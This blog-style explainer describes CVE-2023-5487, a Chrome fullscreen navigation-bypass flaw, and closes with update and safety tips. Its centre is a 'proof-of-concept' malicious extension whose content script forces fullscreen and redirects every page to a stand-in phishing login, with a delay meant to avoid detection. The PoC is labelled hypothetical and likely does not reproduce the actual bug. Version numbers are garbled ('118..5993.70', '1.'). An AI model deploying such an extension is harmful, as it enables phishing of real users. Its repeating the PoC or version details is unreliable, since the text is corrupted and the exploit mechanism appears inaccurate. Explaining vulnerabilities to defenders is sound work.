CVE-2023-5487 - How Malicious Chrome Extensions Abused Fullscreen to Bypass Navigation Restrictions

Google Chrome is the world’s most popular web browser, trusted by billions for both work and leisure. Chrome’s extensibility lets users customize browsing, but this also opens the door to sneaky attackers. A recent security flaw, identified as CVE-2023-5487, showed how an attacker could abuse fullscreen functionality through malicious Chrome extensions to bypass key navigation restrictions. Let's break down exactly what happened, how it worked, and what you need to know to stay safe.

What is CVE-2023-5487?

CVE-2023-5487 is a vulnerability discovered in Google Chrome prior to version 118..5993.70. The chromium team tagged its severity as "Medium." The bug occurred because of an inappropriate implementation of the Fullscreen API, allowing crafty attackers to sidestep Chrome's built-in navigation safeguards using a *malicious Chrome extension*.

Source

- Chrome Release blog post (mentions CVE-2023-5487)
- Official CVE Entry

How Did the Exploit Work?

Generally, when a Chrome extension tries to navigate a page or manipulate browser controls, it’s bound by strict rules. This stops malicious extensions from tricking users or hijacking their sessions. One such rule set applies to the *fullscreen* feature—a standard for immersive web experiences (think watching a video or playing a game).

The vulnerability in CVE-2023-5487 let a malicious Chrome extension

1. Induce the browser (or a single tab) to fullscreen mode, *without the user’s meaningful interaction*.
2. Trick the browser into navigating or displaying content it wasn't supposed to, effectively bypassing the built-in navigation restrictions.

A crafted extension could overlay deceptive UI, making the victim think they were interacting with a trusted site or app, when in reality, all the usual browser protections might not apply. This raised risks of phishing, inadvertent data exposure, and further attack chains.

Proof-of-Concept: A Simplified Exploit

Let's walk through a hypothetical code snippet to see how such an exploit could look inside a malicious Chrome extension's background script and content script (for educational purposes).

manifest.json

{
  "name": "Evil Fullscreen Attack",
  "version": "1.",
  "manifest_version": 3,
  "permissions": [
    "tabs",
    "scripting"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"]
    }
  ]
}

background.js

chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {
  if (changeInfo.status === "complete") {
    chrome.scripting.executeScript({
      target: {tabId: tabId},
      files: ['content.js']
    });
  }
});

content.js

// Automatically requests fullscreen and redirects the user
function exploitFullscreen() {
  document.documentElement.requestFullscreen().then(() => {
    // Once in fullscreen, navigate to a phishing page or overlay fake UI
    window.location.href = 'https://fake-login.example.com';;
  });
}

// Run exploit shortly after page load
window.addEventListener('DOMContentLoaded', function() {
  setTimeout(exploitFullscreen, 100); // short delay to avoid detection
});

What Went Wrong?

Normally, Chrome’s restrictions mean scripts can’t just put you into fullscreen mode without a genuine user gesture (click, keypress, etc.), and extensions can't navigate away from critical pages in unsafe ways. But due to CVE-2023-5487, attackers could sidestep these guardrails—inappropriately opening full screen and hijacking navigation.

The Security Fix

Google patched the vulnerability in version 118..5993.70. If you haven’t already, update Chrome immediately.

You can check your version by visiting

chrome://settings/help

Limit permissions for extensions, uninstall ones you don't use.

- Be cautious with what you do in fullscreen mode—double check URLs, and exit fullscreen if something seems off (press ESC).

Further Reading

- Chromium Security Advisories
- CVE-2023-5487 NVD Entry
- Google’s Guidelines for Safely Using Extensions

Final Thoughts

CVE-2023-5487 shows that even powerful platforms can make mistakes. Exploiting fullscreen might sound boring, but in the wrong hands, small things can lead to big risks. Be vigilant, update often, and only trust extensions you really need.

If you'd like to learn more or try your hand at ethical hacking, always use a controlled lab, never real users or systems.

Timeline

Published on: 10/11/2023 23:15:00 UTC
Last modified on: 10/13/2023 02:15:00 UTC